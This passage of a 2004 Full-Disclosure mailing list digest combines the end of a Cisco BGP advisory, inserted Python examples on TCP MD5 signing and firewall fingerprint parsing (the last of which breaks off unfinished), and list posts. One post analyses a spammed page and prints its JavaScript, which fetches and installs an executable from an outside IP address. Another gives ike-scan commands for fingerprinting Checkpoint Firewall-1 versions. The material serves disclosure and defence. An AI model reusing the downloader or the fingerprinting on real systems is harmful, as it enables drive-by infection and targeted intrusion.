| |-----------+---------+-------------|
| | 12.2(12h) | | |
| 12.2 | M1 | | |
| |-----------+---------+-------------|
| | 12.2(13c) | | |
| |-----------+---------+-------------|
| | 12.2(16a) | | |
| |-----------+---------+-------------|
| | | | 12.2(17) |
|------------+-----------+---------+-------------|
| 12.2B | 12.2(15) | | |
| | B1 | | |
|------------+-----------+---------+-------------|
| 12.2BC | 12.2(15) | | |
| | BC1 | | |
|------------+-----------------------------------|
| 12.2BW | Migrate to 12.2(15)T12 or later |
|------------+-----------------------------------|
| 12.2BX | | | 12.2(16)BX |
|------------+-----------------------------------|
| 12.2BY | Migrate to 12.2(15)B1 or later |
|------------+-----------------------------------|
| 12.2BZ | Migrate to 12.2(16)BX or later |
|------------+-----------------------------------|
| 12.2CX | | | 12.2(15)CX |
|------------+-----------+---------+-------------|
| 12.2DA | 12.2(12) | | |
| | DA6 | | |
|------------+-----------------------------------|
| 12.2DD | Migrate to 12.2(15)B1 or later |
|------------+-----------------------------------|
| 12.2DX | Migrate to 12.2(15)B1 or later |
|------------+-----------------------------------|
| 12.2EW | | | 12.2(18)EW |
|------------+-----------+---------+-------------|
| 12.2JA | | | 12.2(13)JA |
|------------+-----------+---------+-------------|
| | 12.2(14) | | |
| 12.2S | S2 | | |
| |-----------+---------+-------------|
| | | | 12.2(18)S |
|------------+-----------+---------+-------------|
| 12.2SE | | | 12.2(18)SE |
|------------+-----------+---------+-------------|
| 12.2SU | | | 12.2(14)SU |
|------------+-----------+---------+-------------|
| 12.2SV | | | 12.2(18)SV |
|------------+-----------+---------+-------------|
| 12.2SW | | | 12.2(18)SW |
|------------+-----------+---------+-------------|
| 12.2SX | 12.2(14) | | |
| | SX2 | | |
|------------+-----------+---------+-------------|
| 12.2SXA | 12.2(17b) | | |
| | SXA | | |
|------------+-----------+---------+-------------|
| 12.2SXB | 12.2(17d) | | |
| | SXB | | |
|------------+-----------+---------+-------------|
| 12.2SY | | | 12.2(14)SY |
|------------+-----------+---------+-------------|
| 12.2SZ | 12.2(14) | | |
| | SZ2 | | |
|------------+-----------+---------+-------------|
| | 12.2(4)T6 | | |
| |-----------+---------+-------------|
| | 12.2(8) | | |
| | T10 | | |
| |-----------+---------+-------------|
| | 12.2(11) | | |
| 12.2T | T9 | | |
| |-----------+---------+-------------|
| | 12.2(13) | | |
| | T5 | | |
| |-----------+---------+-------------|
| | 12.2(15) | | |
| | T4 | | |
|------------+-----------------------------------|
| 12.2XA | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XB | 12.2(2) | | |
| | XB16 | | |
|------------+-----------------------------------|
| 12.2XD | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.2XE | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.2XG | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.2XH | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XI | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XJ | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XK | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XL | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2XM | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2XN | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XQ | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XS | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XT | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XU | Migrate to 12.2(15)T12 or later |
|------------+-----------------------------------|
| 12.2XW | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2YA | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YB | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YC | Migrate to 12.2(11)T11 or later |
|------------+-----------------------------------|
| 12.2YD | Migrate to 12.2(8)YY or later |
|------------+-----------------------------------|
| 12.2YE | Migrate to 12.2S or later |
|------------+-----------------------------------|
| 12.2YF | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YG | Migrate to 12.2(13)T5 or later |
|------------+-----------------------------------|
| 12.2YH | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YJ | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YL | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YM | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YN | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YO | Migrate to 12.2(14)SY or later |
|------------+-----------------------------------|
| 12.2YP | 12.2(11) | | |
| | YP1 | | |
|------------+-----------------------------------|
| 12.2YQ | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YR | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YS | Migrate to 12.3T or later |
|------------+-----------------------------------|
| 12.2YT | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YU | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YV | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YW | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YX | Migrate to 12.2(14)SU or later |
|------------+-----------------------------------|
| 12.2YY | 12.2(8) | | |
| | YY3 | | |
|------------+-----------------------------------|
| 12.2YZ | Migrate to 12.2(14)SZ or later |
|------------+-----------------------------------|
| 12.2ZA | 12.2(14) | | |
| | ZA2 | | |
|------------+-----------------------------------|
| 12.2ZB | Migrate to 12.3T or later |
|------------+-----------------------------------|
| 12.2ZC | Migrate to 12.3T or later |
|------------+-----------------------------------|
| 12.2ZE | Migrate to 12.3 or later |
|------------+-----------------------------------|
| 12.2ZF | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2ZG | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2ZH | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2ZI | Migrate to 12.2(18)S or later |
|------------+-----------------------------------|
| 12.2ZK | | | 12.2(15)ZK |
|------------+-----------+---------+-------------|
| 12.2ZL | | | 12.2(15)ZL |
|------------+-----------------------------------|
| 12.2ZN | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2ZO | | | 12.2(15)ZO |
|------------+-----------+---------+-------------|
| 12.2ZP | | | 12.2(13)ZP |
|------------+-----------+---------+-------------|
| Affected | | Interim | |
| 12.3-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------------------------------|
| 12.3 | Not Vulnerable |
|------------+-----------------------------------|
| 12.3T | Not Vulnerable |
+------------------------------------------------+
Obtaining Fixed Software
========================
Customers with Service Contracts
Customers with contracts should obtain upgraded software through their regular
update channels. For most customers, this means that upgrades should be
obtained through the Software Center on Cisco's worldwide website at
http://www.cisco.com/tacpage/sw-center.
Customers using Third-party Support Organizations
Customers whose Cisco products are provided or maintained through prior or
existing agreement with third-party support organizations such as Cisco
Partners, authorized resellers, or service providers should contact that
support organization for assistance with the upgrade, which should be free of
charge.
Customers without Service Contracts
Customers who purchase direct from Cisco but who do not hold a Cisco service
contract and customers who purchase through third-party vendors but are
unsuccessful at obtaining fixed software through their point of sale should get
their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC
contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Please have your product serial number available and give the URL of this
notice as evidence of your entitlement to a free upgrade. Free upgrades for
non-contract customers must be requested through the TAC.
Please do not contact either "psirt@cisco.com" or "security-alert@cisco.com"
for software upgrades.
See http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional
TAC contact information, including special localized telephone numbers and
instructions and e-mail addresses for use in various languages.
Customers may only install and expect support for the feature sets they have
purchased. By installing, downloading, accessing or otherwise using such
software upgrades, customers agree to be bound by the terms of Cisco's software
license terms found at http://www.cisco.com/public/sw-license-agreement.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Workarounds
===========
The effectiveness of any workaround is dependent on specific customer
situations such as product mix, network topology, traffic behavior, and
organizational mission. Due to the variety of affected products and releases,
customers should consult with their service provider or support organization to
ensure any applied workaround is the most appropriate for use in the intended
network before it is deployed.
For additional information regarding BGP security risk assessment, mitigation
techniques, and deployment best practices, please consult
ftp://ftp-eng.cisco.com/cons/isp/security/BGP-Risk-Assesment-v.pdf.
BGP MD5
Under normal circumstances, due to inherent security factors in the TCP
protocol such as sequence number checks, it is difficult but possible to forge
an appropriate packet to exploit this problem. Configuring your Cisco IOS
device for BGP MD5 authentication is a valid workaround to protect the
vulnerable device.
This can be configured as shown in the following example (the AS number, the
peer address and the secret are placeholders to be replaced with your own values):
router(config)# router bgp <AS_number>
router(config-router)# neighbor <IP_address> password <enter_your_secret_here>
It is necessary to configure the same shared MD5 secret on both peers and at
the same time. Failure to do so will break the existing BGP session and the new
session will not get established until the exact same secret is configured on
both devices. For a detailed discussion on how to configure BGP, refer to the
following document:
http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/products_configuration_guide_chapter09186a00800ca571.html
Once the secret is configured, it is prudent to change it periodically. The
exact period must fit within your company security policy but it should not be
longer than a few months. When changing the secret, again it must be done at
the same time on both devices. Failure to do so will break your existing BGP
session. The exception is if your Cisco IOS software release contains the
integrated CSCdx23494 fix on both sides of the connection. With this fix,
the BGP session will not be terminated when the MD5 secret is changed only
on one side. The BGP updates, however, will not be processed until either
the same secret is configured on both devices or the secret is removed from
both devices.
Infrastructure Access Control Lists
Although it is often difficult to block traffic transiting your network, it is
possible to identify traffic which should never be allowed to target your
infrastructure devices and block that traffic at the border of your network.
Infrastructure ACLs are considered a network security best practice and should
be considered as a long-term addition to good network security as well as a
workaround for this specific vulnerability. The white paper entitled
"Protecting Your Core: Infrastructure Protection Access Control Lists" presents
guidelines and recommended deployment techniques for infrastructure protection
ACLs:
http://www.cisco.com/warp/public/707/iacl.html
Exploitation and Public Announcements
=====================================
The research that led to the discovery of this vulnerability was publicly
announced at NANOG in June 2003. We were made aware of this issue through
internal testing as well as notification from a research team at the
University of California at Santa Barbara. The Cisco PSIRT is not aware of any
malicious use of the vulnerability described in this advisory.
Status of This Notice: FINAL
============================
This Advisory is provided on an "as is" basis and does not imply any kind of
guarantee or warranty of any kind. Your use of the information on the Advisory
or materials linked from the Advisory is at your own risk. Cisco reserves the
right to change or update this notice at anytime.
Distribution
============
This advisory will be posted on Cisco's worldwide website at
http://www.cisco.com/warp/public/707/cisco-sa-20040616-bgp.shtml.
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail
and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org (includes CERT/CC)
* bugtraq@securityfocus.com
* vulnwatch@wulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.netsys.com
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's worldwide
website, but may or may not be actively announced on mailing lists or
newsgroups. Users concerned about this problem are encouraged to check the
above URL for any updates.
Revision History
================
+---------------------------------------------+
| Revision | 16-June-2004 | Initial Public |
| 1.0 | | Release |
+---------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco products,
obtaining assistance with security incidents, and registering to receive
security information from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This includes
instructions for press inquiries regarding Cisco security notices. All Cisco
security advisories are available at http://www.cisco.com/go/psirt.
-------------------------------------------------------------------------------
All contents are Copyright © 1992-2004 Cisco Systems, Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2
iQA/AwUBQNBRC3sxqM8ytrWQEQLpGQCgiM8vHSFNW9SOGbvyOWN6qRvHWxAAn08R
66EU/1ILdWzJMUxjqJKBy1B2
=YmJU
-----END PGP SIGNATURE-----
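The BGP MD5 workaround in the advisory above rests on the TCP MD5 Signature Option (RFC 2385): every segment of the BGP session carries an MD5 digest computed over the segment and the shared secret, so a RST or SYN forged from guessed sequence numbers is dropped unless the sender also holds the secret. The Python below is an added example, not Cisco's code and not part of the advisory. It computes and verifies the option the way RFC 2385 lays it out (IPv4 pseudo-header, the 20-byte TCP header with its checksum zeroed and options excluded, the data, then the key), using constructed peer addresses, ports and a constructed key, and shows a forged RST failing verification at the receiver.

```python
import hashlib
import hmac
import socket
import struct

TCPOPT_NOP = 1
TCPOPT_MD5SIG = 19      # TCP MD5 Signature Option kind (RFC 2385)
TCPOLEN_MD5SIG = 18     # kind (1) + length (1) + 16-byte MD5 digest
TCP_FLAG_SYN = 0x02
TCP_FLAG_RST = 0x04


def _pseudo_header(src_ip, dst_ip, segment_len):
    """IPv4 pseudo-header: src, dst, zero byte, protocol 6 (TCP), TCP segment length."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                       0, socket.IPPROTO_TCP, segment_len)


def tcp_md5_digest(src_ip, dst_ip, base_header, payload, segment_len, key):
    """MD5 over pseudo-header, the 20-byte TCP header with its checksum zeroed
    (options are excluded), the segment data, and finally the shared key."""
    zeroed = base_header[:16] + b"\x00\x00" + base_header[18:20]
    md = hashlib.md5()
    md.update(_pseudo_header(src_ip, dst_ip, segment_len))
    md.update(zeroed)
    md.update(payload)
    md.update(key)
    return md.digest()


def build_signed_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, payload, key,
                         window=16384):
    """Build a TCP segment (no IP header) carrying the MD5 option, padded with
    two NOPs so the 18-byte option ends on a 4-byte boundary. The TCP checksum
    is left at zero: a real stack fills it in after signing, and the signature
    does not cover it anyway."""
    options_len = TCPOLEN_MD5SIG + 2
    data_offset = (20 + options_len) // 4          # header length in 32-bit words
    base = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                       data_offset << 4, flags, window, 0, 0)
    segment_len = 20 + options_len + len(payload)
    digest = tcp_md5_digest(src_ip, dst_ip, base, payload, segment_len, key)
    options = bytes([TCPOPT_MD5SIG, TCPOLEN_MD5SIG]) + digest + bytes([TCPOPT_NOP, TCPOPT_NOP])
    return base + options + payload


def verify_signed_segment(src_ip, dst_ip, segment, key):
    """True only if the segment carries an MD5 option whose digest matches what
    the receiver computes with its own copy of the key. Unsigned, truncated or
    malformed segments are rejected, as a signed BGP session would drop them."""
    if len(segment) < 20:
        return False
    data_offset = (segment[12] >> 4) * 4
    if data_offset < 20 or data_offset > len(segment):
        return False
    base, options, payload = segment[:20], segment[20:data_offset], segment[data_offset:]
    received = None
    i = 0
    while i < len(options):
        kind = options[i]
        if kind == 0:                       # end of option list
            break
        if kind == TCPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(options):           # kind byte without a length byte
            return False
        length = options[i + 1]
        if length < 2 or i + length > len(options):
            return False
        if kind == TCPOPT_MD5SIG and length == TCPOLEN_MD5SIG:
            received = options[i + 2:i + length]
        i += length
    if received is None:
        return False
    expected = tcp_md5_digest(src_ip, dst_ip, base, payload, len(segment), key)
    return hmac.compare_digest(received, expected)


def demo():
    """Constructed peers and key: a SYN signed with the shared key verifies,
    a RST signed with a guessed key does not."""
    key = b"example-bgp-secret"      # constructed, not a real secret
    a, b = "192.0.2.1", "192.0.2.2"  # documentation addresses standing in for two BGP peers
    syn = build_signed_segment(a, b, 40000, 179, 1000, 0, TCP_FLAG_SYN, b"", key)
    forged_rst = build_signed_segment(a, b, 40000, 179, 1000, 0, TCP_FLAG_RST, b"", b"guess")
    return verify_signed_segment(a, b, syn, key), verify_signed_segment(a, b, forged_rst, key)


if __name__ == "__main__":
    print(demo())
```

Because the key is mixed into every digest, the advisory's warning about changing the secret on both peers at the same time follows directly: the moment the two sides hold different keys, each rejects the other's segments and the session drops.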
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] spamming trojan?
From: Geo. (geoincidents@nls.net)
Date: Wed Jun 16 2004 - 09:06:52 CDT
>>
The end stage appears to be a new variant of the Cjdra proxy trojan.
This person has been spreading trojans via spammed-exploit for a while
now, and now it looks as if he/she has upgraded to the latest IE
exploit.
<<
Am I correct in assuming that this is using the as yet still unpatched IE
exploit and that this is a little more serious than installing adware?
Where the heck are Microsoft and Scot "Information Anarchy" Culp and the
Trusted Computing Forum now? Don't be blaming customers for not visiting
windows update this time.
Geo.
[Full-Disclosure] Re: Antivirus/trojan
From: Paul (onestepto@yahoo.com.au)
Date: Wed Jun 16 2004 - 10:46:44 CDT
It is the Win32/Zafi.B worm.
one step at a time...
[Full-Disclosure] (no subject)
From: Bill Cerynik (bill@vcconsulting.biz)
Date: Wed Jun 16 2004 - 10:59:33 CDT
AMEN!!! Preach it, brother!
Best regards,
Bill Cerynik
Managing Partner
VC Consulting LLC
973.616.8170
bill@vcconsulting.biz
http://www.vcconsulting.biz
<Bringing open source solutions to the real world>
>Message: 12
>Date: Tue, 15 Jun 2004 14:52:11 -0400
>From: Len Rose <len@netsys.com>
>To: full-disclosure@lists.netsys.com
>Subject: [Full-Disclosure] Administrivia: Classical Rant
>
>ATTENTION LAMERS
>
> Speaking for myself only, something has to be done
> about the quality of the information, and the standards
> of netiquette on this list.
>
> We all don't need to see mindless banter, and other noise
> spewing back and forth. If you can, please try to not post
> this spewage to the list, but instead send mail to each other
> (after carefully cutting and pasting on your windows desktop)
>
> If you must send it to the list it must be in terms of
> technical content, whether it is of a real security issue
> and not if Yahoo will increase your disk space or what slashdorks
> posted about something that was known since 2 months ago.
>
> I use the word technical loosely as in my mind, anything
> security related is inherently technical even if it is not
> actually dealing with code or networks or systems.
>
> I'm very sick of seeing the amount of lame crap on this list,
> and I imagine a great deal of others are too.
>
> Thanks for listening.
>
> PS Unlike other "reputable" lists, we try not to censor
> anyone if they at least subscribe and never hit the
> queue. Lately we default to "delete" and try to approve
> those people who insist on posting without subscribing,
> or posting from a non-subscribed address. If "reputable"
> means bugtraq or cert then beat me with a stick.
Re: [Full-Disclosure] spamming trojan?
From: Paul Schmehl (pauls@utdallas.edu)
Date: Wed Jun 16 2004 - 12:33:16 CDT
--On Wednesday, June 16, 2004 08:23:59 AM -0400 "Geo."
<geoincidents@nls.net> wrote:
> Received a spam this morning claiming I have a voicemail with the link
> (warning do not click the link)
>
> http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>
> which brings up a frames based page with one of the frames containing this
>
> function InjectedDuringRedirection(){
>
> showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>
> Anyone want to try and analyze what this thing is? It was spammed to about
> 30 addresses here this morning.
>
All this does is call more functions:
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://219.234.95.124/vbox/shellscript.js'><\/SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);
The real action is at the "RealShell" address:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
The rest should be fairly obvious from the above code.
Paul Schmehl (pauls@utdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
Re: [Full-Disclosure] Akamai
From: Paul Schmehl (pauls@utdallas.edu)
Date: Wed Jun 16 2004 - 12:23:35 CDT
--On Wednesday, June 16, 2004 11:53:23 AM +1000 Darren Reed
<avalon@caligula.anu.edu.au> wrote:
>
> This is a whole new play ground for organised crime, mostly thanks
> to Microsoft. You've got millions of PC's around the world that
> are largely, in one way or another, susceptible to computer virii,
> making them open targets for use as minions. And the perfect seed
> for spreading them is the databases of email addresses used by
> spammers...
>
If networks simply took responsibility for the traffic that comes from
them, this problem wouldn't exist. It's completely trivial to find
infected hosts on a network through passive monitoring. They should then
be disconnected until they are properly cleaned and secured.
Unless networks begin doing this routinely (including ISPs), legislation
will be introduced to "solve" the problem, and then we will all be much
worse off. There's nothing like a law to completely screw things up.
Paul Schmehl (pauls@utdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!
From: Pratik Mehta (PMehta@soa.org)
Date: Wed Jun 16 2004 - 12:24:54 CDT
The shell code is located at
http://219.234.95.124/vbox/shellscript.js
and Macafee points it out as:
VBS/Psyme - Trojan
-Pratik
>>> "Geo." <georger@nls.net> 6/16/2004 7:22:48 AM >>>
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
[Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage
From: Roy Hills (Roy.Hills@nta-monitor.com)
Date: Wed Jun 16 2004 - 09:45:29 CDT
Checkpoint Firewall-1 IKE Vendor ID information leakage
[Note to moderator: I notified Checkpoint of this issue on 13th April
2004, but have not received any response apart from a "We've received
your Email" auto-reply.]
Introduction:
Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
return an IKE Vendor ID payload when it receives an IKE packet with
a specific Vendor ID payload. The Vendor ID payload that is returned
identifies the system as Checkpoint Firewall-1 and also determines the
Firewall-1 version and service-pack or feature-pack revision number.
This is an information leakage issue which can be used to fingerprint
the Firewall-1 system.
This information leakage issue has been verified for Checkpoint Firewall-1
versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1
version 4.0 is not vulnerable because it does not return any Vendor ID
payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
because they do not support IPsec VPN. However, most people are running
either NG or 4.1 and therefore this issue will apply to most Firewall-1
installations that have IPsec VPN enabled.
I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
and demonstrate this issue.
Full details are available at:
http://www.nta-monitor.com/news/checkpoint2004/index.htm
Details:
If an IKE Phase-1 packet with a Vendor ID payload containing the data
"f4ed19e0c114eb516faaac0ee37daf2807b4381f" (20 bytes of binary data
encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
or higher which supports IKE, the Firewall will respond with a Vendor ID
payload containing data which identifies it as a Checkpoint Firewall-1
system, provides details about the version of the Firewall software,
and contains some additional information.
The data that is returned in the Vendor ID payload from the
Firewall consists of the same 20-byte sequence that was sent
(f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes
of data that contains the encoded version number and some other details
that appear to contain details of the Firewall's capabilities.
I presume that the 20-byte "magic string" is an SHA1 hash of something.
I'd be interested to find out what source string hashes to this value.
Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
NG AI R55 (latest current version), I have found the following returned
Vendor ID payloads. In the payloads below, a dot (".") represents an
arbitrary hex digit:
Firewall-1 4.1 Base (no service pack)
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000020000000000000000....0000
Firewall-1 4.1 SP1
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000030000000000000000....0000
Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
f4ed19e0c114eb516faaac0ee37daf2807b4381f0000000100000fa20000000000000000....0000
Firewall-1 NG Base
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013880000000000000000....0000
Firewall-1 NG FP1
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013890000000000000000....0000
Firewall-1 NG FP2
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a0000000000000000....0000
Firewall-1 NG FP3
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138b0000000000000000....0000
Firewall-1 NG AI R54
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c0000000000000000....0000
Firewall-1 NG AI R55
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138d0000000000000000....0000
The version part is given in character positions 53 - 56 inclusive.
E.g. "138d" (decimal 5005) for NG AI R55.
Here's an example using ike-scan v1.6 with an NG FP2 Firewall. Here,
we are specifying RSA authentication with --auth=3 to get the Firewall
to handshake as well as providing the Firewall-1 Vendor ID:
$ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=3 -M 172.16.2.2
Starting ike-scan 1.6 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
172.16.2.2 Main Mode Handshake returned
SA=(Enc=3DES Hash=SHA1 Auth=RSA_Sig Group=2:modp1024
LifeType=Seconds LifeDuration(4)=0x00007080)
VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a000000000000000018800000
(Firewall-1 NG FP2)
Ending ike-scan 1.6: 1 hosts scanned in 0.009 seconds (108.96 hosts/sec).
1 returned handshake; 0 returned notify
Here is a second example fingerprinting an NG AI R54 Firewall using
hybrid authentication (--auth=64221):
$ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=64221 -M 172.16.2.2
Starting ike-scan 1.5.3 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
172.16.2.2 Main Mode Handshake returned
SA=(Enc=3DES Hash=SHA1 Auth=64221 Group=2:modp1024
LifeType=Seconds LifeDuration(4)=0x00007080)
VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c000000000000000018800000
(Firewall-1 NG AI R54)
References:
http://www.nta-monitor.com/news/checkpoint2004/index.htm Issue details
http://www.nta-monitor.com/ike-scan/ ike-scan tool
--
Roy Hills                                 Tel:   +44 1634 721855
NTA Monitor Ltd                           FAX:   +44 1634 721844
14 Ashford House, Beaufort Court,
Medway City Estate,                       Email: Roy.Hills@nta-monitor.com
Rochester, Kent ME2 4FA, UK               WWW:   http://www.nta-monitor.com/
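The decoding rule Roy describes (check the 20-byte magic prefix, read the version field, look it up in his table) is easy to turn into a small parser that a defender can run over ike-scan output from an authorised audit or over Vendor ID payloads extracted from IKE packet captures, to inventory which Firewall-1 releases are answering on their own perimeter. The following is an added example and is not code from the post or from ike-scan; the magic string, the version values and the sample output are taken from the post, the sample run is constructed here, and the function names are the author's own.

```python
import re

# The 20-byte "magic" Vendor ID quoted in the post, and the version values
# it tabulates (hex characters 53-56 of the returned payload, 1-based).
CHECKPOINT_VID_MAGIC = "f4ed19e0c114eb516faaac0ee37daf2807b4381f"

VERSION_TABLE = {
    0x0002: "Firewall-1 4.1 Base (no service pack)",
    0x0003: "Firewall-1 4.1 SP1",
    0x0fa2: "Firewall-1 4.1 SP2-SP6",
    0x1388: "Firewall-1 NG Base",
    0x1389: "Firewall-1 NG FP1",
    0x138a: "Firewall-1 NG FP2",
    0x138b: "Firewall-1 NG FP3",
    0x138c: "Firewall-1 NG AI R54",
    0x138d: "Firewall-1 NG AI R55",
}


def decode_checkpoint_vid(vid_hex):
    """Decode a Vendor ID payload returned by Firewall-1.

    Returns None when the payload does not begin with the Checkpoint magic
    string or is too short to carry the version field.  Otherwise returns
    the raw version number (bytes 24-27 big-endian, i.e. the "0000138a"
    field), its name from the table above, and the trailing bytes the post
    describes as capability and other details.
    """
    vid_hex = vid_hex.strip().lower()
    if len(vid_hex) % 2 or not re.fullmatch(r"[0-9a-f]*", vid_hex):
        raise ValueError("Vendor ID must be an even-length hex string")
    if not vid_hex.startswith(CHECKPOINT_VID_MAGIC) or len(vid_hex) < 56:
        return None
    payload = bytes.fromhex(vid_hex)
    version = int.from_bytes(payload[24:28], "big")
    return {
        "version_code": version,
        "version_name": VERSION_TABLE.get(version, "unknown Firewall-1 release"),
        "trailer_hex": payload[28:].hex(),
    }


# ike-scan -M prints the responding host, then indented SA= and VID= lines.
HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+Main Mode Handshake returned")
VID_RE = re.compile(r"\bVID=([0-9a-fA-F]+)")


def parse_ike_scan_output(text):
    """Return [(host, version_name)] for every Checkpoint VID in ike-scan output."""
    results = []
    host = None
    for line in text.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            host = m.group(1)
            continue
        m = VID_RE.search(line)
        if m and host:
            decoded = decode_checkpoint_vid(m.group(1))
            if decoded:
                results.append((host, decoded["version_name"]))
    return results


# Constructed sample, modelled on the NG FP2 run shown in the post.
SAMPLE_IKE_SCAN_OUTPUT = """\
Starting ike-scan 1.6 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
172.16.2.2\tMain Mode Handshake returned
\tSA=(Enc=3DES Hash=SHA1 Auth=RSA_Sig Group=2:modp1024 LifeType=Seconds LifeDuration(4)=0x00007080)
\tVID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a000000000000000018800000
Ending ike-scan 1.6: 1 hosts scanned in 0.009 seconds (108.96 hosts/sec).  1 returned handshake; 0 returned notify
"""

if __name__ == "__main__":
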